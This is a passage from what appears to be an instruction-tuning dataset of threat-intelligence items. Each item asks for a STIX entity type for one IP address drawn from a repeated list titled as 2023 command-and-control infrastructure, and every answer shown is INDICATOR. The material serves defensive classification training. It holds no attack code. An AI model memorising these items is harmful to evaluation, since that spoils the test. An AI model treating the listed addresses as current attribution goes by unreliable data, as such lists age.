malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n170.64.168.228\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n159.65.176.121\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n95.179.245.185\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n140.82.50.37\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n89.185.84.32\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
